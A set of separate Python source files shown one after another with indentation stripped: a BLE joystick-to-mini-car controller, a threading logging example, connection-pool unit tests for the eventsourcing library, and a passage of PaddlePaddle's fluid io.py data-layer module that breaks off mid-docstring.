def device_subscribe(self, uuid_full, callback):
self.con_device.subscribe(uuid_full, callback)
def main():
print "BLE Adapter - start init...."
CMD = "f30b5000"
event_car = threading.Event()
event_joystick = threading.Event()
event_car_write = threading.Event()
adapter = BLEAdapter()
adapter.scan_remote_devices()
BLE_name_car = "Minicar BLE"
address_car = adapter.get_device_address(BLE_name_car)
print "Mini Car - BLE address '%s'" %address_car
BLE_name_joystick = "JoyStick BLE"
address_joystick = adapter.get_device_address(BLE_name_joystick)
print "Joy Stick - BLE address '%s'" %address_joystick
def func_car(address_car):
print "Mini Car - start init...."
adapter_car = BLEAdapter()
event_car.wait()
try:
con_car = adapter_car.connect_device(address_car)
print "Mini Car - be connected"
devices_car = RemoteBLEDevice(con_car)
devices_car.device_bond()
car_driver_uuid_short = "ff10"
car_driver_uuid_full, car_driver_handle = devices_car.get_uuid_and_handle(car_driver_uuid_short)
car_sensor_uuid_short = "ff20"
car_sensor_uuid_full, car_sensor_handle = devices_car.get_uuid_and_handle(car_sensor_uuid_short)
except :
print "Mini Car - please reboot A101 board"
while 1:
global CMD
event_car_write.wait()
try:
devices_car.write_value(car_driver_handle, CMD)
print "Mini Car - send data '%s'" %CMD
except :
print "Mini Car - please reboot A101 board"
event_car_write.clear()
def func_joystick(address_joystick):
print "Joy Stick - start init...."
adapter_joystick = BLEAdapter()
event_joystick.wait()
try:
con_JS = adapter_joystick.connect_device(address_joystick)
print "Joy Stick - be connected"
devices_JS = RemoteBLEDevice(con_JS)
devices_JS.device_bond()
JS_notify_uuid_short = "fffa"
JS_notify_uuid_full, JS_notify_handle = devices_JS.get_uuid_and_handle(JS_notify_uuid_short)
JS_read_uuid_short = "fffb"
JS_read_uuid_full, JS_read_handle = devices_JS.get_uuid_and_handle(JS_read_uuid_short)
except :
print "Joy Stick - please reboot A101 board"
def _joystick_callback_func(handle, value):
global CMD
CMD = value.decode("utf-8")
event_car_write.set()
print "Joy Stick - get data '%s'" %CMD
devices_JS.device_subscribe(JS_notify_uuid_full, _joystick_callback_func)
print "Joy Stick - subscribe"
print "BLE Adapter - all init completed"
thread_car = threading.Thread(target=func_car, args=(address_car,))
thread_joystick = threading.Thread(target=func_joystick, args=(address_joystick,))
thread_car.setDaemon(True)
thread_car.start()
time.sleep(10)
thread_joystick.setDaemon(True)
thread_joystick.start()
time.sleep(10)
event_car.set()
time.sleep(10)
event_joystick.set()
while 1:
try :
time.sleep(2)
except KeyboardInterrupt :
print "BLE Adapter - exit"
break
except :
print "BLE Adapter - error"
continue
if __name__ == "__main__" :
print "Test to control mini car using joy stick"
main()
|
5.thread_with_logger.py
|
import logging
import threading
import time
logging.basicConfig(level=logging.DEBUG,
format='[%(levelname)s] (%(threadName)-10s) %(message)s',
)
def worker():
logging.debug('Starting')
time.sleep(2)
logging.debug('Exiting')
def my_service():
logging.debug('Starting')
time.sleep(3)
logging.debug('Exiting')
t = threading.Thread(name='my_service', target=my_service)
w = threading.Thread(name='worker', target=worker)
w2 = threading.Thread(target=worker) # use default name
w.start()
w2.start()
t.start()
|
test_connection_pool.py
|
from concurrent.futures import ThreadPoolExecutor, TimeoutError
from itertools import count
from threading import Event, Lock, Thread
from time import sleep, time
from typing import Any, List, Optional, Union
from unittest import TestCase
from eventsourcing.persistence import (
Connection,
ConnectionNotFromPool,
ConnectionPool,
ConnectionPoolClosed,
ConnectionPoolExhausted,
Cursor,
PersistenceError,
ProgrammingError,
ReaderBlockedByWriter,
WriterBlockedByReaders,
WriterBlockedByWriter,
)
class DummyCursor(Cursor):
def __init__(self):
self._closed = False
self._results = None
def execute(self, statement: Union[str, bytes], params: Any = None):
if self._closed:
raise PersistenceError
assert statement == "SELECT 1"
self._results = [[1]]
def fetchall(self):
if self._closed:
raise PersistenceError
if self._results is None:
raise ProgrammingError
return self._results
def fetchone(self):
if self._closed:
raise PersistenceError
if self._results is None:
raise ProgrammingError
return self._results[0]
def close(self):
self._closed = True
class DummyConnection(Connection):
def __init__(self, max_age: Optional[float] = None):
super().__init__(max_age=max_age)
self._cursors: List[DummyCursor] = []
self._closed_on_server = False
def commit(self):
if self.closed:
raise PersistenceError("Closed")
def rollback(self):
if self.closed:
raise PersistenceError("Closed")
def cursor(self):
curs = DummyCursor()
self._cursors.append(curs)
if self._closed or self._closed_on_server:
curs.close()
return curs
def _close(self):
for curs in self._cursors:
curs.close()
super()._close()
def close_on_server(self):
self._closed_on_server = True
class DummyConnectionPool(ConnectionPool):
def _create_connection(self) -> Connection:
return DummyConnection(max_age=self.max_age)
class TestConnection(TestCase):
def test_commit_rollback_close(self):
conn = DummyConnection()
self.assertFalse(conn.closed)
self.assertFalse(conn.closing)
self.assertTrue(conn.in_use.locked())
conn.commit()
conn.rollback()
conn.close()
self.assertTrue(conn.closed)
self.assertFalse(conn.closing)
with self.assertRaises(PersistenceError):
conn.commit()
with self.assertRaises(PersistenceError):
conn.rollback()
def test_max_age(self):
conn = DummyConnection(max_age=0)
sleep(0.01)
self.assertTrue(conn.closing)
self.assertFalse(conn.closed)
conn.in_use.release()
sleep(0.01)
self.assertTrue(conn.closed)
def test_close_on_server(self):
conn = DummyConnection()
conn.close_on_server()
self.assertFalse(conn.closing)
self.assertFalse(conn.closed)
with self.assertRaises(PersistenceError):
conn.cursor().execute("SELECT 1")
class TestConnectionPool(TestCase):
ProgrammingError = ProgrammingError
PersistenceError = PersistenceError
def create_pool(
self,
pool_size=1,
max_overflow=0,
max_age=None,
pre_ping=False,
mutually_exclusive_read_write=False,
):
return DummyConnectionPool(
pool_size=pool_size,
max_overflow=max_overflow,
max_age=max_age,
pre_ping=pre_ping,
mutually_exclusive_read_write=mutually_exclusive_read_write,
)
def close_connection_on_server(self, *connections):
for conn in connections:
assert isinstance(conn, DummyConnection)
conn.close_on_server()
def test_get_and_put(self):
pool = self.create_pool(pool_size=2, max_overflow=2)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 0)
conn1 = pool.get_connection()
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 0)
conn2 = pool.get_connection()
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 0)
conn3 = pool.get_connection()
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 0)
conn4 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
pool.put_connection(conn1)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn1.closed)
conn5 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
pool.put_connection(conn2)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn2.closed)
pool.put_connection(conn3)
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 2)
self.assertFalse(conn3.closed)
pool.put_connection(conn4)
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn4.closed)
pool.put_connection(conn5)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn5.closed)
# Do it all again.
conn6 = pool.get_connection()
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 1)
conn7 = pool.get_connection()
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 0)
conn8 = pool.get_connection()
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 0)
conn9 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
pool.put_connection(conn6)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn6.closed)
conn10 = pool.get_connection()
self.assertEqual(pool.num_in_use, 4)
self.assertEqual(pool.num_in_pool, 0)
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
pool.put_connection(conn7)
self.assertEqual(pool.num_in_use, 3)
self.assertEqual(pool.num_in_pool, 1)
self.assertFalse(conn7.closed)
pool.put_connection(conn8)
self.assertEqual(pool.num_in_use, 2)
self.assertEqual(pool.num_in_pool, 2)
self.assertFalse(conn8.closed)
pool.put_connection(conn9)
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn9.closed)
pool.put_connection(conn10)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 2)
self.assertTrue(conn10.closed)
def test_connection_not_from_pool(self):
pool = self.create_pool()
with self.assertRaises(ConnectionNotFromPool):
pool.put_connection(pool._create_connection())
def test_close_before_returning(self):
pool = self.create_pool()
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 0)
conn1 = pool.get_connection()
self.assertEqual(pool.num_in_use, 1)
self.assertEqual(pool.num_in_pool, 0)
conn1.close()
pool.put_connection(conn1)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 0)
def test_close_after_returning(self):
pool = self.create_pool()
conn1 = pool.get_connection()
pool.put_connection(conn1)
conn1.close()
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 1)
conn1 = pool.get_connection()
self.assertFalse(conn1.closed)
def test_close_on_server_after_returning_without_pre_ping(self):
pool = self.create_pool()
conn1 = pool.get_connection()
curs = conn1.cursor()
with self.assertRaises(self.ProgrammingError):
self.assertEqual(curs.fetchall(), None)
curs.execute("SELECT 1")
self.assertEqual(curs.fetchall(), [[1]])
pool.put_connection(conn1)
self.close_connection_on_server(conn1)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 1)
conn1 = pool.get_connection()
self.assertFalse(conn1.closed)
with self.assertRaises(self.PersistenceError):
conn1.cursor().execute("SELECT 1")
def test_close_on_server_after_returning_with_pre_ping(self):
pool = self.create_pool(pre_ping=True)
conn1 = pool.get_connection()
pool.put_connection(conn1)
self.close_connection_on_server(conn1)
self.assertEqual(pool.num_in_use, 0)
self.assertEqual(pool.num_in_pool, 1)
conn2 = pool.get_connection()
self.assertFalse(conn2.closed)
curs = conn2.cursor()
curs.execute("SELECT 1")
self.assertEqual(curs.fetchall(), [[1]])
def test_max_age(self):
pool = self.create_pool(max_age=0.05)
# Timer fires after conn returned to pool.
conn1 = pool.get_connection()
self.assertFalse(conn1.closed)
self.assertFalse(conn1.closing)
pool.put_connection(conn1)
self.assertEqual(pool.num_in_pool, 1)
sleep(0.1)
self.assertTrue(conn1.closed)
# Pool returns a new connection.
conn2 = pool.get_connection()
self.assertEqual(pool.num_in_pool, 0)
self.assertFalse(conn2.closed)
self.assertFalse(conn2.closing)
self.assertNotEqual(id(conn1), id(conn2))
self.assertEqual(pool.num_in_pool, 0)
# Timer fires before conn returned to pool.
sleep(0.1)
self.assertFalse(conn2.closed)
self.assertTrue(conn2.closing)
self.assertEqual(pool.num_in_pool, 0)
pool.put_connection(conn2)
self.assertEqual(pool.num_in_pool, 0)
sleep(0.05)
self.assertTrue(conn1.closed)
# Pool returns another new connection.
conn3 = pool.get_connection()
self.assertFalse(conn3.closed)
self.assertFalse(conn3.closing)
self.assertNotEqual(id(conn2), id(conn3))
pool.put_connection(conn3)
def test_get_with_timeout(self):
pool = self.create_pool()
# Get a connection.
conn1 = pool.get_connection()
# Check request for a second connection times out immediately.
started = time()
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0)
ended = time()
self.assertLess(ended - started, 0.1)
# Check request for a second connection times out after delay.
started = time()
with self.assertRaises(ConnectionPoolExhausted):
pool.get_connection(timeout=0.1)
ended = time()
self.assertGreater(ended - started, 0.1)
# Check request for second connection is kept waiting
# but doesn't timeout if first connection is returned.
getting_conn2 = Event()
got_conn2 = Event()
def put_conn1():
getting_conn2.wait()
sleep(0.05)
pool.put_connection(conn1)
def get_conn2():
getting_conn2.set()
pool.get_connection(timeout=0.1)
got_conn2.set()
thread1 = Thread(target=put_conn1, daemon=True)
thread2 = Thread(target=get_conn2, daemon=True)
thread1.start()
thread2.start()
self.assertTrue(got_conn2.wait(timeout=0.3))
def test_close_pool(self):
# Get three connections and return one of them.
pool = self.create_pool(pool_size=2, max_overflow=1)
conn1 = pool.get_connection()
conn2 = pool.get_connection()
conn3 = pool.get_connection()
pool.put_connection(conn1)
# Close pool.
pool.close()
# All connections are closed (returned and those in use).
self.assertTrue(conn1.closed)
self.assertTrue(conn2.closed)
self.assertTrue(conn3.closed)
# Raises error when putting connection after pool closed.
with self.assertRaises(ConnectionPoolClosed):
pool.put_connection(conn2)
with self.assertRaises(ConnectionPoolClosed):
pool.put_connection(conn3)
# Raises error when getting connection after pool closed.
with self.assertRaises(ConnectionPoolClosed):
pool.get_connection()
# Can call close() twice.
pool.close()
def test_fairness_1_0_pre_ping_false(self):
self._test_fairness(pool_size=1, max_overflow=0, pre_ping=False)
def test_fairness_1_0_pre_ping_true(self):
self._test_fairness(pool_size=1, max_overflow=0, pre_ping=True)
def test_fairness_3_2_pre_ping_false(self):
self._test_fairness(pool_size=3, max_overflow=2, pre_ping=False)
def test_fairness_3_2_pre_ping_true(self):
self._test_fairness(pool_size=3, max_overflow=2, pre_ping=True)
def _test_fairness(self, pool_size=1, max_overflow=1, pre_ping=True):
connection_pool = self.create_pool(
pool_size=pool_size, max_overflow=max_overflow, pre_ping=pre_ping
)
num_threads = 5
num_gets = 5
hold_connection_for = 0.1
expected_wait_periods = num_threads
timeout_get_connection = expected_wait_periods * hold_connection_for * 1.5
self.counter = count()
thread_pool = ThreadPoolExecutor(max_workers=num_threads)
futures = []
wait_for = None
is_stopped = Event()
debug = False
def get_conn(
name,
has_started,
wait_for,
do_close,
):
if wait_for:
assert wait_for.wait(timeout=1)
has_started.set()
if debug:
print(name, "started")
for _ in range(num_gets):
# print(name, "getting connection")
started = time()
try:
conn = connection_pool.get_connection(
timeout=timeout_get_connection
)
except Exception as exp:
waited_for = time() - started
msg = (
f"{name} errored after {waited_for :.3f}, "
f"timeout {timeout_get_connection}"
)
print(msg, type(exp))
raise Exception(msg) from exp
else:
assert conn
if pre_ping:
assert not conn.closed
j = next(self.counter)
if debug:
waited_for = time() - started
print(
name,
"got connection",
j,
"after",
f"{waited_for :.3f}",
f"{timeout_get_connection - waited_for :.3f}",
)
assert (
connection_pool.num_in_use
<= connection_pool.pool_size + connection_pool.max_overflow
)
assert connection_pool.num_in_pool <= connection_pool.pool_size
if debug:
print("num used connections:", connection_pool.num_in_use)
if not ((j + 1) % 4) and do_close:
if debug:
print("closing connection", j, "before returning to pool")
conn.close()
sleep(hold_connection_for)
if not ((j + 3) % 4) and do_close:
if debug:
print("closing connection", j, "after returning to pool")
conn.close()
connection_pool.put_connection(conn)
# sleep(0.001)
if is_stopped.is_set():
print(name, "stopping early....")
return
# print(name, "put connection", j)
if debug:
print(name, "finished")
for k in range(num_threads):
has_started = Event()
future = thread_pool.submit(
get_conn,
name=k,
has_started=has_started,
wait_for=wait_for,
do_close=True,
)
wait_for = has_started
futures.append(future)
total_timeout = num_gets * (timeout_get_connection + hold_connection_for) * 1.5
future_wait_started = time()
for future in futures:
try:
future.result(timeout=total_timeout)
except TimeoutError as e:
is_stopped.set()
raise Exception(
f"Timed out{time() - future_wait_started}, timeout {total_timeout}"
) from e
except Exception:
is_stopped.set()
raise
def test_reader_writer(self):
self._test_reader_writer_with_mutually_exclusive_read_write()
self._test_reader_writer_without_mutually_exclusive_read_write()
def _test_reader_writer_with_mutually_exclusive_read_write(self):
pool = self.create_pool(pool_size=3, mutually_exclusive_read_write=True)
self.assertTrue(pool._mutually_exclusive_read_write)
# Get writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
self.assertIs(writer_conn.is_writer, True)
# Return writer.
pool.put_connection(writer_conn)
# Get two readers.
reader_conn1 = pool.get_connection(is_writer=False)
reader_conn2 = pool.get_connection(is_writer=False)
self.assertIs(reader_conn1.is_writer, False)
self.assertIs(reader_conn2.is_writer, False)
# Fail to get writer.
with self.assertRaises(WriterBlockedByReaders):
pool.get_connection(is_writer=True, timeout=0)
# Return readers to pool.
pool.put_connection(reader_conn1)
pool.put_connection(reader_conn2)
# Get writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
# Fail to get reader.
with self.assertRaises(ReaderBlockedByWriter):
pool.get_connection(is_writer=False, timeout=0)
# Fail to get writer.
with self.assertRaises(WriterBlockedByWriter):
pool.get_connection(is_writer=True, timeout=0)
# Return writer.
pool.put_connection(writer_conn)
# Get and put another writer.
writer_conn = pool.get_connection(is_writer=True)
pool.put_connection(writer_conn)
# Get two readers.
reader_conn1 = pool.get_connection(is_writer=False)
reader_conn2 = pool.get_connection(is_writer=False)
pool.put_connection(reader_conn1)
pool.put_connection(reader_conn2)
def _test_reader_writer_without_mutually_exclusive_read_write(self):
pool = self.create_pool(pool_size=3, mutually_exclusive_read_write=False)
self.assertFalse(pool._mutually_exclusive_read_write)
# Get writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
self.assertIs(writer_conn.is_writer, True)
# Get two readers.
reader_conn1 = pool.get_connection(is_writer=False)
reader_conn2 = pool.get_connection(is_writer=False)
self.assertIs(reader_conn1.is_writer, False)
self.assertIs(reader_conn2.is_writer, False)
# Fail to get another writer.
with self.assertRaises(WriterBlockedByWriter):
pool.get_connection(is_writer=True, timeout=0)
# Return writer.
pool.put_connection(writer_conn)
# Return readers to pool.
pool.put_connection(reader_conn1)
pool.put_connection(reader_conn2)
# Get two readers.
pool.get_connection(is_writer=False)
pool.get_connection(is_writer=False)
# Get another writer.
writer_conn = pool.get_connection(is_writer=True, timeout=0)
# Fail to get another writer.
with self.assertRaises(WriterBlockedByWriter):
pool.get_connection(is_writer=True, timeout=0)
# Return writer.
pool.put_connection(writer_conn)
# Get and put another writer.
writer_conn = pool.get_connection(is_writer=True)
pool.put_connection(writer_conn)
_print = print
print_lock = Lock()
def print(*args):
with print_lock:
_print(*args)
|
io.py
|
# Copyright (c) 2018 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import contextlib
import multiprocessing
import threading
from ..data_feeder import DataFeeder
from .control_flow import BlockGuard
from .layer_function_generator import templatedoc
from .. import core
from ..executor import global_scope
from ..framework import convert_np_dtype_to_dtype_, default_main_program, \
default_startup_program, program_guard, Program
from ..layer_helper import LayerHelper
from ..unique_name import generate as unique_name
__all__ = [
'data', 'open_recordio_file', 'open_files', 'read_file', 'shuffle', 'batch',
'double_buffer', 'random_data_generator', 'py_reader', 'Preprocessor',
'load'
]
def data(name,
shape,
append_batch_size=True,
dtype='float32',
lod_level=0,
type=core.VarDesc.VarType.LOD_TENSOR,
stop_gradient=True):
"""
**Data Layer**
This function takes in the input and based on whether data has
to be returned back as a minibatch, it creates the global variable by using
the helper functions. The global variables can be accessed by all the
following operators in the graph.
All the input variables of this function are passed in as local variables
to the LayerHelper constructor.
Args:
name(str): The name/alias of the function
shape(list): Tuple declaring the shape.
append_batch_size(bool): Whether or not to append the data as a batch.
dtype(int|float): The type of data : float32, float_16, int etc
type(VarType): The output type. By default it is LOD_TENSOR.
lod_level(int): The LoD Level. 0 means the input data is not a sequence.
stop_gradient(bool): A boolean that mentions whether gradient should flow.
Returns:
Variable: The global variable that gives access to the data.
Examples:
.. code-block:: python
data = fluid.layers.data(name='x', shape=[784], dtype='float32')
"""
helper = LayerHelper('data', **locals())
shape = list(shape)
for i in range(len(shape)):
if shape[i] is None:
shape[i] = -1
append_batch_size = False
elif shape[i] < 0:
append_batch_size = False
if append_batch_size:
shape = [-1] + shape # append batch size as -1
data_var = helper.create_global_variable(
name=name,
shape=shape,
dtype=dtype,
type=type,
stop_gradient=stop_gradient,
lod_level=lod_level,
is_data=True)
return data_var
class BlockGuardServ(BlockGuard):
"""
BlockGuardServ class.
BlockGuardServ class is used to create an op with a block in a program.
"""
def __init__(self, server):
if not (isinstance(server, ListenAndServ)):
raise TypeError("BlockGuardServ takes a ListenAndServ")
super(BlockGuardServ, self).__init__(server.helper.main_program)
self.server = server
def __exit__(self, exc_type, exc_val, exc_tb):
if exc_type is not None:
return False
self.server.complete_op()
return super(BlockGuardServ, self).__exit__(exc_type, exc_val, exc_tb)
class ListenAndServ(object):
"""
**ListenAndServ Layer**
ListenAndServ is used to create a rpc server bind and listen
on specific TCP port, this server will run the sub-block when
received variables from clients.
Args:
endpoint(string): IP:port string which the server will listen on.
inputs(list): a list of variables that the server will get from clients.
fan_in(int): how many client are expected to report to this server, default: 1.
optimizer_mode(bool): whether to run the server as a parameter server, default: True.
Examples:
.. code-block:: python
with fluid.program_guard(main):
serv = layers.ListenAndServ(
"127.0.0.1:6170", ["X"], optimizer_mode=False)
with serv.do():
x = layers.data(
shape=[32, 32],
dtype='float32',
name="X",
append_batch_size=False)
fluid.initializer.Constant(value=1.0)(x, main.global_block())
layers.scale(x=x, scale=10.0, out=out_var)
exe = fluid.Executor(place)
exe.run(main)
"""
def __init__(self, endpoint, inputs, fan_in=1, optimizer_mode=True):
self.helper = LayerHelper("listen_and_serv")
self.inputs = inputs
self.outputs = []
self.endpoint = endpoint
self.fan_in = fan_in
# FIXME(typhoonzero): add optimizer_mode is stupid, should make it more
# general.
self.optimizer_mode = optimizer_mode
def do(self):
return BlockGuardServ(self)
def get_params_and_grads(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
# params and grads in the same order.
params = list()
grads = list()
for op in current_block.ops:
# FIXME(typhoonzero): op.inputs is None if it's cloned.
if self.optimizer_mode:
if "Grad" in op.inputs and "Param" in op.inputs:
params.append(op.inputs["Param"].name)
grads.append(op.inputs["Grad"].name)
else:
# simple recv mode, recv operators inputs.
for iname in op.input_names:
for in_var_name in op.input(iname):
params.append(parent_block.var(in_var_name))
grads.append(parent_block.var(in_var_name))
return params, grads
def parent_block(self):
prog = self.helper.main_program
parent_idx = prog.current_block().parent_idx
assert parent_idx >= 0
parent_block = prog.block(parent_idx)
return parent_block
def complete_op(self):
main_program = self.helper.main_program
current_block = main_program.current_block()
parent_block = self.parent_block()
parent_block.append_op(
type='listen_and_serv',
inputs={"X": self.inputs},
outputs={},
attrs={
'endpoint': self.endpoint,
'Fanin': self.fan_in,
'optimize_blocks': [
current_block
], # did not support multiple optimize blocks in layers
'sync_mode': True, # did not support async now in layers
'grad_to_block_id': [""]
})
def Send(endpoints, send_vars, sync=True):
"""
Send variables to the server side, and get vars from server
side when server have finished running server side program.
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
send_vars (list): variables to send to server
sync (bool): whether to wait the request finish
"""
assert (type(send_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Send", **locals())
rpc_op_role_name = core.op_proto_and_checker_maker.kOpRoleAttrName()
helper.append_op(
type="send",
inputs={"X": send_vars},
attrs={
"endpoints": endpoints,
"epmap": epmap,
rpc_op_role_name: core.op_proto_and_checker_maker.OpRole.RPC
})
if sync:
helper.append_op(type="send_barrier", attrs={"endpoints": endpoints})
def Recv(endpoints, get_vars, sync=True):
"""
Receive variables from server side
Args:
endpoints (str): comma seperated IP:PORT pairs in the order
of send_vars to send
get_vars (list): vars to get from server after send completes.
sync (bool): whether to wait the request finish
Returns:
list: list of received variables
"""
assert (type(get_vars) == list)
epmap = endpoints.split(",")
endpoints = list(set(epmap))
helper = LayerHelper("Recv", **locals())
helper.append_op(
type="recv",
inputs={"X": get_vars},
outputs={"Out": get_vars},
attrs={"endpoints": endpoints,
"epmap": epmap})
if sync:
helper.append_op(type="fetch_barrier", attrs={"endpoints": endpoints})
return get_vars
def monkey_patch_reader_methods(reader):
def __get_reader__():
scope = global_scope()
var = scope.find_var(reader.name)
return var.get_reader()
def reset():
return __get_reader__().reset()
reader.reset = reset
reader.stop_gradient = True
reader.persistable = True
return reader
def _copy_reader_var_(block, var):
new_var = block.create_var(name=var.name, type=core.VarDesc.VarType.READER)
new_var.desc.set_shapes(var.desc.shapes())
new_var.desc.set_dtypes(var.desc.dtypes())
new_var.persistable = True
return new_var
def _copy_reader_create_op_(block, op):
input_param_names = op.input_names
new_input_map = {}
for param_name in input_param_names:
new_input_map[param_name] = []
arg_names = op.input(param_name)
for arg_name in arg_names:
new_input_map[param_name].append(block.var(arg_name))
output_param_names = op.output_names
new_output_map = {}
for param_name in output_param_names:
new_output_map[param_name] = []
arg_names = op.output(param_name)
for arg_name in arg_names:
new_output_map[param_name].append(block.var(arg_name))
new_op = block.append_op(
type=op.type,
inputs=new_input_map,
outputs=new_output_map,
attrs=op.all_attrs())
return new_op
@templatedoc(op_type='create_recordio_file_reader')
def open_recordio_file(filename,
shapes,
lod_levels,
dtypes,
pass_num=1,
for_parallel=True):
"""
${comment}
Args:
filename(${filename_type}): ${filename_comment}.
shapes(list): List of tuples which declaring data shapes.
lod_levels(${lod_levels_type}): ${lod_levels_comment}.
dtypes(list): List of strs which declaring data type.
pass_num(int): Number of passes to run.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
${out_comment}.
Examples:
>>> import paddle.fluid as fluid
>>> reader = fluid.layers.io.open_recordio_file(
>>> filename='./data.recordio',
>>> shapes=[(3,224,224), (1)],
>>> lod_levels=[0, 0],
>>> dtypes=['float32', 'int64'])
>>> # Via the reader, we can use 'read_file' layer to get data:
>>> image, label = fluid.layers.io.read_file(reader)
"""
dtypes = [convert_np_dtype_to_dtype_(dt) for dt in dtypes]
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('open_recordio_file')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_recordio_file_reader',
outputs={'Out': [startup_var]},
attrs={
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'filename': filename,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
if pass_num > 1:
main_prog_var = multi_pass(reader=main_prog_var, pass_num=pass_num)
return monkey_patch_reader_methods(main_prog_var)
def random_data_generator(low, high, shapes, lod_levels, for_parallel=True):
"""
Create a uniform random data generator
This layer returns a Reader Variable.
Instead of opening a file and reading data from it, this
Reader Variable generates float uniform random data by itself.
It can be used as a dummy reader to test a network without
opening a real file.
Args:
low(float): The lower bound of data's uniform distribution.
high(float): The upper bound of data's uniform distribution.
shapes(list): List of tuples which declaring data shapes.
lod_levels(list): List of ints which declaring data lod_level.
for_parallel(Bool): Set it as True if you are going to run
subsequent operators in parallel.
Returns:
Variable: A Reader Variable from which we can get random data.
Examples:
.. code-block:: python
reader = fluid.layers.random_data_generator(
low=0.0,
high=1.0,
shapes=[[3,224,224], [1]],
lod_levels=[0, 0])
# Via the reader, we can use 'read_file' layer to get data:
image, label = fluid.layers.read_file(reader)
"""
dtypes = [core.VarDesc.VarType.FP32] * len(shapes)
shape_concat = []
ranks = []
for shape in shapes:
shape_concat.extend(shape)
ranks.append(len(shape))
var_name = unique_name('random_data_generator')
startup_blk = default_startup_program().current_block()
startup_var = startup_blk.create_var(name=var_name)
startup_blk.append_op(
type='create_random_data_generator',
outputs={'Out': [startup_var]},
attrs={
'low': low,
'high': high,
'shape_concat': shape_concat,
'lod_levels': lod_levels,
'ranks': ranks
})
startup_var.desc.set_dtypes(dtypes)
startup_var.persistable = True
main_prog_var = _copy_reader_var_(default_main_program().current_block(),
startup_var)
return monkey_patch_reader_methods(main_prog_var)
def py_reader(capacity,
shapes,
dtypes,
lod_levels=None,
name=None,
use_double_buffer=True):
"""
Create a Python reader for data feeding in Python
This layer returns a Reader Variable.
The Reader provides :code:`decorate_paddle_reader()` and
:code:`decorate_tensor_provider()` to set a Python generator as the data
source in Python side. When :code:`Executor::Run()` is invoked in C++
side, the data from the generator would be read automatically. Unlike
:code:`DataFeeder.feed()`, the data reading process and
:code:`Executor::Run()` process can run in parallel using
:code:`py_reader`. The :code:`start()` method of the Reader should be
called when each pass begins, while the :code:`reset()` method should be
called when the pass ends and :code:`fluid.core.EOFException` raises.
Note that :code:`Program.clone()` method cannot clone :code:`py_reader`.
Args:
capacity(int): The buffer capacity maintained by :code:`py_reader`.
shapes(list|tuple): List of tuples which declaring data shapes.
dtypes(list|tuple): List of strs which declaring data type.
lod_levels(list|tuple): List of ints which declaring data lod_level.
name(basestring): The prefix Python queue name and Reader name. None will
be generated automatically.
use_double_buffer(bool): Whether use double buffer or not.
Returns:
Variable: A Reader from which we can get feeding data.
Examples:
1. The basic usage of :code:`py_reader` is as follows:
>>> import paddle.v2
>>> import paddle.fluid as fluid
>>> import paddle.dataset.mnist as mnist
>>>
>>> reader = fluid.layers.py_reader(capacity=64,
>>> shapes=[(-1,3,224,224), (-1,1)],
>>> dtypes=['float32', 'int64'])
>>> reader.decorate_paddle_reader(
